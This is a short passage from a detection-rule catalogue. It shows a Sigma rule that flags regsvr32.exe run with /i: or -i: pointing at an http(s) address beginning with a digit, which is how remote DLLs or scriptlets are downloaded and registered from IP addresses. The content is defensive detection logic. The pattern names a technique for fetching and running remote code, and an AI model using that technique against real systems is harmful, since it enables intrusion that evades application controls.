fqdns that start with a number such as \"7-zip\"

Techniques

Sample rules

Potentially Suspicious Regsvr32 HTTP IP Pattern

source: sigma
technicques:
- t1218
- t1218.010

Description

Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.

Detection logic

condition: all of selection_*
selection_img:
- Image|endswith: \regsvr32.exe
- OriginalFileName: REGSVR32.EXE
selection_ip:
  CommandLine|contains:
  - ' /i:http://1'
  - ' /i:http://2'
  - ' /i:http://3'
  - ' /i:http://4'
  - ' /i:http://5'
  - ' /i:http://6'
  - ' /i:http://7'
  - ' /i:http://8'
  - ' /i:http://9'
  - ' /i:https://1'
  - ' /i:https://2'
  - ' /i:https://3'
  - ' /i:https://4'
  - ' /i:https://5'
  - ' /i:https://6'
  - ' /i:https://7'
  - ' /i:https://8'
  - ' /i:https://9'
  - ' -i:http://1'
  - ' -i:http://2'
  - ' -i:http://3'
  - ' -i:http://4'
  - ' -i:http://5'
  - ' -i:http://6'
  - ' -i:http://7'
  - ' -i:http://8'
  - ' -i:http://9'
  - ' -i:https://1'
  - ' -i:https://2'
  - ' -i:https://3'
  - ' -i:https://4'
  - ' -i:https://5'
  - ' -i:https://6'
  - ' -i:https://7'
  - ' -i:https://8'
  - ' -i:https://9'